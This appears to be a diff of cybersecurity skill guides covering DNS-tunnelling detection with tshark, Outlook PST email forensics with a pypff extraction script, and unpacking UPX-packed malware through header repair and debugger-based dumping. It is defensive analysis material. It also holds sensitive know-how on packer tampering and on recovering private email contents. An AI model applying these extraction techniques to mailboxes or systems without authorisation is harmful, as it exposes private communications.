# Calculate capture file hash for chain of custody
|
||||
sha256sum capture.pcapng > capture_hash.txt
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Capture Filter (BPF)** | Berkeley Packet Filter syntax applied at capture time to limit which packets are recorded, reducing file size and improving performance |
|
||||
| **Display Filter** | Wireshark-specific filter syntax applied to already-captured packets for focused analysis without altering the capture file |
|
||||
| **PCAPNG** | Next-generation packet capture format supporting multiple interfaces, name resolution, annotations, and metadata in a single file |
|
||||
| **TCP Stream** | Reassembled sequence of TCP segments representing a complete bidirectional conversation between two endpoints |
|
||||
| **Protocol Dissector** | Wireshark module that decodes a specific protocol's fields and structure, enabling deep inspection of packet contents |
|
||||
| **IO Graph** | Time-series visualization of packet or byte rates over the capture duration, useful for identifying traffic spikes or beaconing |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark 4.0+**: GUI-based packet analyzer with protocol dissectors for 3,000+ protocols, stream reassembly, and export capabilities
|
||||
- **tshark**: Command-line version of Wireshark for headless capture, batch processing, and scripted analysis pipelines
|
||||
- **tcpdump**: Lightweight packet capture tool for quick captures on remote systems without GUI dependencies
|
||||
- **mergecap**: Wireshark utility for combining multiple capture files into a single PCAP for unified analysis
|
||||
- **editcap**: Wireshark utility for splitting, filtering, and converting between capture file formats
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Investigating Suspected Data Exfiltration via DNS Tunneling
|
||||
|
||||
**Context**: The SOC team detected unusually high DNS query volumes from a workstation (10.10.3.45) to an external domain. The SIEM alert flagged DNS queries averaging 200 per minute compared to the baseline of 15. A packet capture was initiated from the network tap on the workstation's VLAN.
|
||||
|
||||
**Approach**:
|
||||
1. Capture traffic from the workstation's subnet using `tshark -i eth2 -f "host 10.10.3.45 and port 53" -w dns_exfil_investigation.pcapng`
|
||||
2. Analyze DNS query patterns: `tshark -r dns_exfil_investigation.pcapng -Y "dns.qry.name contains \"suspect-domain.xyz\"" -T fields -e frame.time -e dns.qry.name`
|
||||
3. Examine subdomain labels for encoded data (long base64-like subdomains indicate tunneling): `tshark -r dns_exfil_investigation.pcapng -Y "dns.qry.type == 16" -T fields -e dns.qry.name -e dns.txt`
|
||||
4. Calculate data volume by summing query name lengths to estimate exfiltration bandwidth
|
||||
5. Extract unique query names and decode base64 subdomains to recover exfiltrated content
|
||||
6. Export evidence packets to a separate PCAP and generate SHA-256 hash for chain of custody
|
||||
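Step 4 of the approach can be sketched as follows. The input is assumed to be the list of names produced by `tshark ... -T fields -e dns.qry.name`; `estimate_exfil_chars` is an illustrative name, and the 3/4 decoding ratio in the usage note holds only if the labels really are base64.

```python
def estimate_exfil_chars(query_names, base_domain):
    """Sum the encoded characters carried in subdomain labels of unique queries.

    Names are deduplicated case-sensitively because base64-style encodings
    are case-sensitive; the base domain itself is matched case-insensitively.
    """
    suffix = "." + base_domain.strip(".").lower()
    unique = {n.strip().rstrip(".") for n in query_names if n.strip()}
    total = 0
    for name in unique:
        if name.lower().endswith(suffix):
            # Drop the base domain and the label separators, keep the payload
            total += len(name[: -len(suffix)].replace(".", ""))
    return total
```

Multiplying the result by 3/4 approximates the decoded byte count for base64 payloads (5/8 for base32). Retransmitted or cached queries can still skew the figure, so treat it as an upper-bound estimate.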
|
||||
**Pitfalls**:
|
||||
- Capturing unfiltered traffic on a busy network and running out of disk space before collecting relevant data
|
||||
- Using display filters instead of capture filters, resulting in massive files that are slow to process
|
||||
- Overlooking encrypted DNS (DoH/DoT) traffic that bypasses traditional DNS capture on port 53
|
||||
- Failing to establish packet capture hash and chain of custody documentation for forensic evidence
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
## Traffic Analysis Report
|
||||
|
||||
**Case ID**: IR-2024-0847
|
||||
**Capture File**: dns_exfil_investigation.pcapng
|
||||
**SHA-256**: a3f2b8c1d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1
|
||||
**Duration**: 2024-03-15 14:00:00 to 14:45:00 UTC
|
||||
**Source Interface**: eth2 (VLAN 30 span port)
|
||||
|
||||
### Findings
|
||||
|
||||
**1. DNS Tunneling Confirmed**
|
||||
- Source: 10.10.3.45
|
||||
- Destination DNS: 8.8.8.8 (forwarded to ns1.suspect-domain.xyz)
|
||||
- Query volume: 9,247 queries in 45 minutes (205/min vs 15/min baseline)
|
||||
- Average subdomain label length: 63 characters (base64-encoded data)
|
||||
- Estimated data exfiltrated: ~2.3 MB encoded in query names (upper bound before decoding)
|
||||
|
||||
**2. Indicators of Compromise**
|
||||
- Domain: suspect-domain.xyz (registered 3 days prior)
|
||||
- Nameserver: ns1.suspect-domain.xyz (203.0.113.50)
|
||||
- Query pattern: TXT record requests with base64-encoded subdomains
|
||||
- Response pattern: TXT records containing base64-encoded payloads
|
||||
```
|
||||
@@ -0,0 +1,241 @@
|
||||
---
|
||||
name: analyzing-outlook-pst-for-email-forensics
|
||||
description: Analyze Microsoft Outlook PST and OST files for email forensic evidence including message content, headers, attachments, deleted items, and metadata using libpff, pst-utils, and forensic email analysis tools for legal investigations and incident response.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [email-forensics, pst, ost, outlook, mapi, email-headers, attachments, deleted-emails, libpff, eml-extraction]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Outlook PST for Email Forensics
|
||||
|
||||
## Overview
|
||||
|
||||
Microsoft Outlook PST (Personal Storage Table) and OST (Offline Storage Table) files are critical evidence sources in digital forensics investigations. PST files store email messages, calendar events, contacts, tasks, and notes in a proprietary binary format based on the MAPI (Messaging Application Programming Interface) property system. Forensic analysis of these files enables recovery of deleted emails (from the Recoverable Items folder), extraction of email headers for tracing message routes, analysis of attachments for malware or exfiltrated data, and reconstruction of communication patterns. Unicode-format PST files (introduced with Outlook 2003) default to a 50 GB size limit in Outlook 2010 and later, while the legacy ANSI format is limited to 2 GB. The 4 KB page variant of the format is found in OST files created by Outlook 2013 and later.
|
||||
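The ANSI/Unicode distinction can be checked directly from the file header before any parsing tool is run. The sketch below assumes the header layout from the MS-PST specification: the `!BDN` signature at offset 0, a 2-byte client marker at offset 8, and the little-endian `wVer` field at offset 10 (14 or 15 for ANSI, 23 or higher for Unicode). The `SO` (OST) and `AB` (PAB) markers follow libpff's format notes and should be treated as an assumption. `identify_pst_format` is an illustrative name.

```python
import struct


def identify_pst_format(header: bytes) -> dict:
    """Classify a PST/OST file from its first 12 header bytes."""
    if len(header) < 12 or header[:4] != b"!BDN":
        raise ValueError("not a PST/OST file (missing !BDN signature)")
    client = header[8:10]
    (w_ver,) = struct.unpack_from("<H", header, 10)
    kind = {b"SM": "PST", b"SO": "OST", b"AB": "PAB"}.get(client, "unknown")
    if w_ver in (14, 15):
        fmt = "ANSI"
    elif w_ver >= 23:
        fmt = "Unicode"
    else:
        fmt = "unknown"
    return {"type": kind, "version": w_ver, "format": fmt}
```

A typical call reads only the start of the evidence file, for example `identify_pst_format(open("evidence.pst", "rb").read(12))`, so it is safe to run against a read-only mounted image.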
|
||||
## Prerequisites
|
||||
|
||||
- libpff/pffexport (open-source PST parser)
|
||||
- Python 3.8+ with pypff or libratom libraries
|
||||
- MailXaminer, Forensic Email Collector, or SysTools PST Forensics (commercial)
|
||||
- Microsoft Outlook (optional, for native PST access)
|
||||
- Sufficient disk space for extracted content
|
||||
|
||||
## PST File Locations
|
||||
|
||||
| Source | Path |
|
||||
|--------|------|
|
||||
| Outlook 2016+ Default | %USERPROFILE%\Documents\Outlook Files\*.pst |
|
||||
| Outlook Legacy | %LOCALAPPDATA%\Microsoft\Outlook\*.pst |
|
||||
| OST Cache | %LOCALAPPDATA%\Microsoft\Outlook\*.ost |
|
||||
| Archive | %USERPROFILE%\Documents\Outlook Files\archive.pst |
|
||||
|
||||
## Analysis with Open-Source Tools
|
||||
|
||||
### libpff / pffexport
|
||||
|
||||
```bash
|
||||
# Export all items (allocated, orphaned, and recovered) from the PST file
# Options are placed before the source file
pffexport -m all -t exported_pst evidence.pst

# Export allocated items only (the default mode)
pffexport -m items -t exported_emails evidence.pst

# Export recovered/deleted items
pffexport -m recovered -t recovered_items evidence.pst
|
||||
|
||||
# Get PST file information
|
||||
pffinfo evidence.pst
|
||||
```
|
||||
|
||||
### Python PST Analysis
|
||||
|
||||
```python
|
||||
import pypff
import os
import json
import hashlib
import email
import sys
from datetime import datetime
from collections import defaultdict


class PSTForensicAnalyzer:
    """Forensic analysis of Outlook PST/OST files."""

    def __init__(self, pst_path: str, output_dir: str):
        self.pst_path = pst_path
        self.output_dir = output_dir
        os.makedirs(output_dir, exist_ok=True)
        self.pst = pypff.file()
        self.pst.open(pst_path)
        self.messages = []
        self.attachments = []
        self.stats = defaultdict(int)

    def process_folder(self, folder, folder_path: str = ""):
        """Recursively process PST folders and extract messages."""
        folder_name = folder.name or "Root"
        current_path = f"{folder_path}/{folder_name}" if folder_path else folder_name

        for i in range(folder.number_of_sub_messages):
            try:
                message = folder.get_sub_message(i)
                msg_data = self.extract_message(message, current_path)
                if msg_data:
                    self.messages.append(msg_data)
                    self.stats["total_messages"] += 1
            except Exception as e:
                self.stats["parse_errors"] += 1

        for i in range(folder.number_of_sub_folders):
            try:
                subfolder = folder.get_sub_folder(i)
                self.process_folder(subfolder, current_path)
            except Exception:
                continue

    def extract_message(self, message, folder_path: str) -> dict:
        """Extract forensic metadata from a single email message."""
        msg_data = {
            "folder": folder_path,
            "subject": message.subject or "",
            "sender": message.sender_name or "",
            "sender_email": "",
            "creation_time": str(message.creation_time) if message.creation_time else None,
            "delivery_time": str(message.delivery_time) if message.delivery_time else None,
            "modification_time": str(message.modification_time) if message.modification_time else None,
            "has_attachments": message.number_of_attachments > 0,
            "attachment_count": message.number_of_attachments,
            "body_size": len(message.plain_text_body or b""),
            "html_size": len(message.html_body or b""),
        }

        # Extract transport headers for routing analysis
        headers = message.transport_headers
        if headers:
            msg_data["headers_present"] = True
            msg_data["headers_size"] = len(headers)
            # Parse key headers
            parsed = email.message_from_string(headers)
            msg_data["from_header"] = parsed.get("From", "")
            msg_data["to_header"] = parsed.get("To", "")
            msg_data["date_header"] = parsed.get("Date", "")
            msg_data["message_id"] = parsed.get("Message-ID", "")
            msg_data["x_originating_ip"] = parsed.get("X-Originating-IP", "")
            msg_data["received_headers"] = parsed.get_all("Received", [])

        # Process attachments
        for j in range(message.number_of_attachments):
            try:
                attachment = message.get_attachment(j)
                att_data = {
                    "message_subject": msg_data["subject"],
                    "name": attachment.name or f"attachment_{j}",
                    "size": attachment.size,
                    "content_type": "",
                }
                self.attachments.append(att_data)
                self.stats["total_attachments"] += 1
            except Exception:
                continue

        return msg_data

    def save_attachments(self, max_size_mb: int = 100):
        """Export attachments to disk for analysis."""
        att_dir = os.path.join(self.output_dir, "attachments")
        os.makedirs(att_dir, exist_ok=True)

        root = self.pst.get_root_folder()
        self._save_attachments_recursive(root, att_dir, max_size_mb)

    def _save_attachments_recursive(self, folder, att_dir, max_size_mb):
        for i in range(folder.number_of_sub_messages):
            try:
                message = folder.get_sub_message(i)
                for j in range(message.number_of_attachments):
                    att = message.get_attachment(j)
                    if att.size and att.size < max_size_mb * 1024 * 1024:
                        name = att.name or f"unknown_{i}_{j}"
                        safe_name = "".join(c if c.isalnum() or c in ".-_" else "_" for c in name)
                        path = os.path.join(att_dir, safe_name)
                        try:
                            data = att.read_buffer(att.size)
                            with open(path, "wb") as f:
                                f.write(data)
                        except Exception:
                            continue
            except Exception:
                continue

        for i in range(folder.number_of_sub_folders):
            try:
                self._save_attachments_recursive(folder.get_sub_folder(i), att_dir, max_size_mb)
            except Exception:
                continue

    def generate_report(self) -> str:
        """Generate comprehensive PST forensic analysis report."""
        root = self.pst.get_root_folder()
        self.process_folder(root)

        report = {
            "analysis_timestamp": datetime.now().isoformat(),
            "pst_file": self.pst_path,
            "pst_size_bytes": os.path.getsize(self.pst_path),
            "statistics": dict(self.stats),
            "messages": self.messages[:500],
            "attachments": self.attachments[:200],
        }

        report_path = os.path.join(self.output_dir, "pst_forensic_report.json")
        with open(report_path, "w") as f:
            json.dump(report, f, indent=2, default=str)

        print(f"[*] Total messages: {self.stats['total_messages']}")
        print(f"[*] Total attachments: {self.stats['total_attachments']}")
        print(f"[*] Parse errors: {self.stats['parse_errors']}")
        return report_path

    def close(self):
        self.pst.close()


def main():
    if len(sys.argv) < 3:
        print("Usage: python process.py <pst_file> <output_dir>")
        sys.exit(1)
    analyzer = PSTForensicAnalyzer(sys.argv[1], sys.argv[2])
    analyzer.generate_report()
    analyzer.close()


if __name__ == "__main__":
    main()
|
||||
```
|
||||
|
||||
## Email Header Analysis
|
||||
|
||||
Key headers for forensic investigation:
|
||||
|
||||
| Header | Forensic Value |
|--------|----------------|
| Received | Message routing chain (read bottom to top) |
| X-Originating-IP | Client IP recorded by the submitting mail service (not always present; untrusted if added before the first trusted hop) |
| Message-ID | Unique identifier for correlation |
| Date | Send timestamp as set by the sender (compare against Received timestamps) |
| Return-Path | Bounce address (may differ from From) |
| DKIM-Signature | Domain authentication signature |
| Authentication-Results | SPF, DKIM, DMARC verification results |
| X-Mailer | Email client used |
|
||||
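
The table above can be turned into a quick header summary. The following is a minimal sketch using only Python's standard `email` package; it assumes the raw transport headers have already been extracted as text, and the function name `summarize_headers` and the sample addresses are illustrative, not part of the original script.

```python
from email import message_from_string

# Headers from the table above; the email package matches names case-insensitively.
KEY_HEADERS = ["Message-ID", "Date", "Return-Path", "X-Originating-IP",
               "DKIM-Signature", "Authentication-Results", "X-Mailer"]


def summarize_headers(raw_headers: str) -> dict:
    """Collect the forensically relevant headers from raw header text."""
    msg = message_from_string(raw_headers)
    summary = {name: msg.get(name) for name in KEY_HEADERS}
    # Each relay prepends its own Received header, so reversing the list
    # yields the route in chronological order (origin first).
    summary["Received"] = list(reversed(msg.get_all("Received", [])))
    return summary


# Hypothetical sample headers for illustration only
sample = (
    "Received: from mx.example.net by mail.example.org; Tue, 2 Jan 2024 10:00:05 +0000\n"
    "Received: from client.example.com by mx.example.net; Tue, 2 Jan 2024 10:00:01 +0000\n"
    "Return-Path: <bounce@example.com>\n"
    "Message-ID: <abc123@example.com>\n"
    "\n"
)
summary = summarize_headers(sample)
for hop in summary["Received"]:
    print(hop)
```

Headers that are absent come back as `None`, which is itself worth recording in the report.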
|
||||
## References
|
||||
|
||||
- MailXaminer PST Forensics: https://www.mailxaminer.com/blog/outlook-pst-file-forensics/
|
||||
- libpff Documentation: https://github.com/libyal/libpff
|
||||
- PST File Format Specification: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/
|
||||
- SANS Email Forensics: https://www.sans.org/blog/email-forensics/
|
||||
@@ -0,0 +1,16 @@
|
||||
# Standards - Outlook PST Email Forensics
|
||||
## Standards
|
||||
- MS-PST: Outlook Personal Folders (.pst) File Format
|
||||
- MS-OXMSG: Outlook Item Message File Format
|
||||
- NIST SP 800-86: Guide to Integrating Forensic Techniques
|
||||
## Tools
|
||||
- libpff/pffexport: Open-source PST parser
|
||||
- pypff (Python): Python bindings for libpff
|
||||
- MailXaminer: Commercial email forensics
|
||||
- PST Walker: Email investigation software
|
||||
- Kernel Outlook PST Viewer: Free PST reader
|
||||
## Key Artifacts
|
||||
- Email headers (Received, X-Originating-IP, Message-ID)
|
||||
- Deleted items (Recoverable Items folder)
|
||||
- Attachments (malware, exfiltrated data)
|
||||
- Calendar events, contacts, tasks
|
||||
@@ -0,0 +1,19 @@
|
||||
# Workflows - PST Email Forensics
|
||||
## Workflow: Email Evidence Extraction
|
||||
```
|
||||
Acquire PST/OST files from evidence
    |
Hash original files (SHA-256)
    |
Export with pffexport (items + recovered)
    |
Parse email headers for routing
    |
Extract and hash attachments
    |
Search for keywords across messages
    |
Build communication timeline
    |
Document findings with chain of custody
|
||||
```
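
The two hashing steps in the workflow (original files, then extracted attachments) can be sketched as follows. This is an illustrative helper using only the standard library; the names `sha256_file` and `hash_manifest` are assumptions, not functions from the skill's script.

```python
import hashlib
from pathlib import Path


def sha256_file(path, chunk_size=1024 * 1024) -> str:
    """Hash a file in chunks so large PST/OST files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_manifest(directory) -> dict:
    """Map every file under `directory` (by relative path) to its SHA-256 digest."""
    root = Path(directory)
    return {
        str(p.relative_to(root)): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }
```

Recording the manifest before and after analysis gives a simple way to show that the evidence copies were not altered.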
|
||||
@@ -0,0 +1,299 @@
|
||||
---
|
||||
name: analyzing-packed-malware-with-upx-unpacker
|
||||
description: >
  Identifies and unpacks UPX-packed and other packed malware samples to expose the original
  executable code for static analysis. Covers both standard UPX unpacking and handling
  modified UPX headers that prevent automated decompression. Activates for requests involving
  malware unpacking, UPX decompression, packer removal, or preparing packed samples for analysis.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, unpacking, UPX, packing, static-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Packed Malware with UPX Unpacker
|
||||
|
||||
## When to Use
|
||||
|
||||
- Static analysis reveals high entropy sections and minimal imports indicating the binary is packed
|
||||
- PEiD, Detect It Easy, or PEStudio identifies UPX or another known packer
|
||||
- The import table contains only LoadLibrary and GetProcAddress (runtime import resolution typical of packed binaries)
|
||||
- You need to recover the original binary for proper disassembly and decompilation in Ghidra or IDA
|
||||
- Automated UPX decompression fails because the malware author modified UPX magic bytes or headers
|
||||
|
||||
**Do not use** when dealing with custom packers, VM-based protectors (Themida, VMProtect), or samples where dynamic unpacking via debugging is more appropriate.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- UPX (Ultimate Packer for eXecutables) installed (`apt install upx-ucl` or download from https://upx.github.io/)
|
||||
- Detect It Easy (DIE) for packer identification
|
||||
- Python 3.8+ with `pefile` library for manual header repair
|
||||
- x64dbg or x32dbg for manual unpacking when automated tools fail
|
||||
- PE-bear or CFF Explorer for PE header inspection and repair
|
||||
- Isolated analysis VM without network connectivity
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the Packer
|
||||
|
||||
Determine if the sample is packed and identify the packer:
|
||||
|
||||
```bash
|
||||
# Check with Detect It Easy
diec suspect.exe

# Check with UPX (test without unpacking)
upx -t suspect.exe

# Python-based entropy and packer detection
python3 << 'PYEOF'
import pefile

pe = pefile.PE("suspect.exe")

print("Section Analysis:")
for section in pe.sections:
    # Malware may use non-UTF-8 section names, so decode defensively
    name = section.Name.decode(errors="replace").rstrip('\x00')
    entropy = section.get_entropy()
    raw = section.SizeOfRawData
    virtual = section.Misc_VirtualSize
    print(f"  {name:8s} Entropy: {entropy:.2f}  Raw: {raw:>8}  Virtual: {virtual:>8}")

# Check for UPX section names
section_names = [s.Name.decode(errors="replace").rstrip('\x00') for s in pe.sections]
if 'UPX0' in section_names or 'UPX1' in section_names:
    print("\n[!] UPX section names detected")
elif '.upx' in [s.lower() for s in section_names]:
    print("\n[!] UPX variant section names detected")

# Check import count (packed binaries have very few)
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
    total_imports = sum(len(e.imports) for e in pe.DIRECTORY_ENTRY_IMPORT)
    print(f"\nTotal imports: {total_imports}")
    if total_imports < 10:
        print("[!] Very few imports - likely packed")
else:
    print("\n[!] No import directory - heavily packed")
PYEOF
|
||||
```
|
||||
|
||||
### Step 2: Attempt Standard UPX Decompression
|
||||
|
||||
Try the built-in UPX decompression:
|
||||
|
||||
```bash
|
||||
# Standard UPX decompress
|
||||
upx -d suspect.exe -o unpacked.exe
|
||||
|
||||
# If UPX fails with "not packed by UPX" error, the headers may be modified
|
||||
# Verbose output for debugging
|
||||
upx -d suspect.exe -o unpacked.exe -v 2>&1
|
||||
|
||||
# Verify the unpacked file
|
||||
file unpacked.exe
|
||||
diec unpacked.exe
|
||||
```
|
||||
|
||||
### Step 3: Repair Modified UPX Headers
|
||||
|
||||
If standard decompression fails, repair tampered magic bytes:
|
||||
|
||||
```python
|
||||
# Repair modified UPX headers (reads suspect.exe, writes a separate fixed copy)
import struct

with open("suspect.exe", "rb") as f:
    data = bytearray(f.read())

# UPX magic bytes: "UPX!" (0x55505821)
# Malware authors commonly modify these to prevent automatic unpacking,
# e.g. "UPX!" -> "UPX\x00", "UPx!", or "\x00PX!"
upx_magic = b"UPX!"

# Locate the section table from the PE headers
pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
num_sections = struct.unpack_from("<H", data, pe_offset + 6)[0]
section_table_offset = pe_offset + 0x18 + struct.unpack_from("<H", data, pe_offset + 0x14)[0]
section_table_end = section_table_offset + num_sections * 40

print(f"PE offset: 0x{pe_offset:X}")
print(f"Number of sections: {num_sections}")
print(f"Section table offset: 0x{section_table_offset:X}")

for i in range(num_sections):
    offset = section_table_offset + (i * 40)
    name = data[offset:offset+8]
    print(f"Section {i}: {bytes(name)}")

# Restore UPX magic bytes in the binary.
# The UPX header signature typically sits near the end of the packed data.
# The section table is skipped so valid names such as "UPX0"/"UPX1" are not
# overwritten. Only magics whose fourth byte was changed are caught here;
# review every reported hit, since unrelated "UPX" strings can also match.
for i in range(len(data) - 3):
    if section_table_offset <= i < section_table_end:
        continue
    if data[i:i+3] == b"UPX" and data[i+3] != ord("!"):
        print(f"Found modified UPX magic at offset 0x{i:X}: {bytes(data[i:i+4])}")
        data[i:i+4] = upx_magic
        print("Restored to: UPX!")

# Also restore section names if modified
for i in range(num_sections):
    offset = section_table_offset + (i * 40)
    name = data[offset:offset+8].rstrip(b'\x00')
    if name in [b"UPX0", b"UPX1", b"UPX2"]:
        continue  # Already correct
    # Check for common modifications
    if name.startswith(b"UP") or name.startswith(b"ux"):
        original = f"UPX{i}".encode().ljust(8, b'\x00')
        data[offset:offset+8] = original
        print(f"Restored section name at 0x{offset:X} to {original}")

with open("suspect_fixed.exe", "wb") as f:
    f.write(data)

print("\nFixed file written. Retry: upx -d suspect_fixed.exe -o unpacked.exe")
|
||||
```
|
||||
|
||||
### Step 4: Manual Unpacking with Debugger
|
||||
|
||||
When automated unpacking fails entirely, use dynamic unpacking:
|
||||
|
||||
```
|
||||
Manual UPX Unpacking with x64dbg (use x32dbg for 32-bit samples; the PUSHAD/ESP steps apply to x86):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Load packed sample in x64dbg
2. Run to the entry point (system breakpoint then F9)
3. UPX unpacking stub pattern:
   a. PUSHAD (saves all registers)
   b. Decompression loop (processes packed sections)
   c. Resolves imports (LoadLibrary/GetProcAddress calls)
   d. POPAD (restores registers)
   e. JMP to OEP (original entry point)
4. Set hardware breakpoint on ESP after PUSHAD:
   - After PUSHAD, right-click ESP in registers -> Follow in Dump
   - Set hardware breakpoint on access at [ESP] address
   - Run (F9) - breaks at POPAD before JMP to OEP
5. Step forward (F7/F8) until you reach the JMP to OEP
6. At OEP: Use Scylla plugin to dump and fix imports:
   - Plugins -> Scylla -> OEP = current EIP
   - Click "IAT Autosearch" -> "Get Imports"
   - Click "Dump" to save unpacked binary
   - Click "Fix Dump" to repair import table
|
||||
```
|
||||
|
||||
### Step 5: Validate Unpacked Binary
|
||||
|
||||
Verify the unpacked sample is valid and complete:
|
||||
|
||||
```bash
|
||||
# Verify unpacked PE is valid
python3 << 'PYEOF'
import os
import pefile

pe = pefile.PE("unpacked.exe")

# Check sections are normal
print("Unpacked Section Analysis:")
for section in pe.sections:
    name = section.Name.decode(errors="replace").rstrip('\x00')
    entropy = section.get_entropy()
    print(f"  {name:8s} Entropy: {entropy:.2f}")

# Verify imports are resolved
print("\nImport count:")
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
    for entry in pe.DIRECTORY_ENTRY_IMPORT:
        dll = entry.dll.decode()
        count = len(entry.imports)
        print(f"  {dll}: {count} functions")
    total = sum(len(e.imports) for e in pe.DIRECTORY_ENTRY_IMPORT)
    print(f"  Total: {total} imports")

# Compare file sizes
packed_size = os.path.getsize("suspect.exe")
unpacked_size = os.path.getsize("unpacked.exe")
print(f"\nPacked:   {packed_size:>10} bytes")
print(f"Unpacked: {unpacked_size:>10} bytes")
print(f"Ratio:    {unpacked_size/packed_size:.1f}x")
PYEOF
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|------------|
| **Packing** | Compressing or encrypting executable code to reduce file size and hinder static analysis; the binary contains an unpacking stub that restores code at runtime |
| **UPX** | Ultimate Packer for eXecutables; open-source executable packer commonly abused by malware authors because it is free and effective |
| **Original Entry Point (OEP)** | The real starting address of the malware code before packing; the unpacking stub decompresses code then jumps to the OEP |
| **Import Reconstruction** | Process of rebuilding the import address table after dumping an unpacked process from memory using tools like Scylla or ImpRec |
| **PUSHAD/POPAD** | x86 instructions that save/restore all general-purpose registers; UPX uses this pattern to preserve register state during unpacking |
| **Section Entropy** | Randomness measure of PE section data; packed sections show entropy > 7.0 while normal code sections average 5.0-6.5 |
| **Magic Bytes** | Signature bytes within a file identifying its format; UPX uses "UPX!" which malware authors modify to prevent automated decompression |
|
||||
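
Section entropy in the table refers to Shannon entropy over byte values, H = -Σ p_i log2(p_i), which ranges from 0 (a single repeated byte) to 8 bits per byte (uniformly distributed bytes). As a minimal sketch of the calculation, independent of `pefile` (the function name `shannon_entropy` is illustrative):

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of `data` in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)  # frequency of each byte value
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


# Thresholds follow the table above: packed or encrypted data tends toward 8.0
for label, blob in [("zero padding", b"\x00" * 64), ("all byte values", bytes(range(256)))]:
    print(f"{label}: {shannon_entropy(blob):.2f}")
```

An empty section such as a typical `UPX0` (zero raw size) reports 0.0, which is why the high-entropy `UPX1` section is the one to look at.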
|
||||
## Tools & Systems
|
||||
|
||||
- **UPX**: Open-source executable packer with built-in decompression capability for properly packed files
|
||||
- **Detect It Easy (DIE)**: Packer, compiler, and linker detection tool that identifies protection on PE, ELF, and Mach-O files
|
||||
- **x64dbg/x32dbg**: Open-source Windows debugger used for manual unpacking through dynamic execution and breakpoint-based OEP finding
|
||||
- **Scylla**: Import reconstruction tool integrated with x64dbg for rebuilding IAT after memory dumping
|
||||
- **PE-bear**: PE file viewer and editor for inspecting and repairing PE headers after unpacking
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Unpacking Malware with Modified UPX Headers
|
||||
|
||||
**Context**: A malware sample is identified as UPX-packed by section names (UPX0, UPX1) but `upx -d` fails with "CantUnpackException: header corrupted". The malware author modified the UPX magic bytes to prevent automated decompression.
|
||||
|
||||
**Approach**:
|
||||
1. Open the binary in a hex editor and search for the UPX header area (typically at the end of packed data)
|
||||
2. Identify the modified magic bytes (e.g., "UPX!" changed to "UPX\x00" or completely zeroed)
|
||||
3. Use the Python repair script to restore "UPX!" magic and correct section names
|
||||
4. Retry `upx -d` on the repaired binary
|
||||
5. If repair fails, fall back to manual unpacking with x64dbg (PUSHAD -> hardware BP on ESP -> POPAD -> JMP OEP)
|
||||
6. Validate the unpacked binary has proper imports and reasonable entropy values
|
||||
7. Import into Ghidra or IDA for full static analysis
|
||||
|
||||
**Pitfalls**:
|
||||
- Assuming UPX is the only packer; the binary may be double-packed (UPX + custom layer)
|
||||
- Modifying the original packed sample instead of working on a copy
|
||||
- Not reconstructing imports after manual memory dump (the dumped binary will crash without IAT fix)
|
||||
- Forgetting to check for overlay data appended after the UPX-packed PE sections
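
The overlay pitfall can be checked before unpacking. The sketch below is one way to do it with only the standard library: it walks the PE section table and reports any bytes that lie beyond the last section's raw data. The helper name `find_overlay` is hypothetical, and the check is deliberately simple; for example, it does not distinguish an Authenticode certificate table from other appended data.

```python
import struct


def find_overlay(data: bytes):
    """Return (offset, size) of data past the last section, or None if there is none."""
    pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    num_sections = struct.unpack_from("<H", data, pe_offset + 6)[0]
    opt_header_size = struct.unpack_from("<H", data, pe_offset + 0x14)[0]
    table = pe_offset + 0x18 + opt_header_size

    end_of_image = 0
    for i in range(num_sections):
        entry = table + i * 40  # each section header is 40 bytes
        # SizeOfRawData is at +16 and PointerToRawData at +20 in the section header
        raw_size, raw_ptr = struct.unpack_from("<II", data, entry + 16)
        end_of_image = max(end_of_image, raw_ptr + raw_size)

    if end_of_image and len(data) > end_of_image:
        return end_of_image, len(data) - end_of_image
    return None
```

A typical use is `find_overlay(open("suspect.exe", "rb").read())`; if it returns an offset, carve and hash that region separately, because it may not survive `upx -d` intact.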
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
UNPACKING ANALYSIS REPORT
|
||||
===========================
|
||||
Sample: suspect.exe
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
Packer: UPX 3.96 (modified headers)
|
||||
|
||||
PACKED BINARY
|
||||
Sections: UPX0 (entropy: 0.00) UPX1 (entropy: 7.89) .rsrc (entropy: 3.45)
|
||||
Imports: 2 (kernel32.dll: LoadLibraryA, GetProcAddress)
|
||||
File Size: 98,304 bytes
|
||||
|
||||
UNPACKING METHOD
|
||||
Method: Header repair + UPX -d
|
||||
Header Fix: Restored UPX! magic at offset 0x1F000
|
||||
Command: upx -d suspect_fixed.exe -o unpacked.exe
|
||||
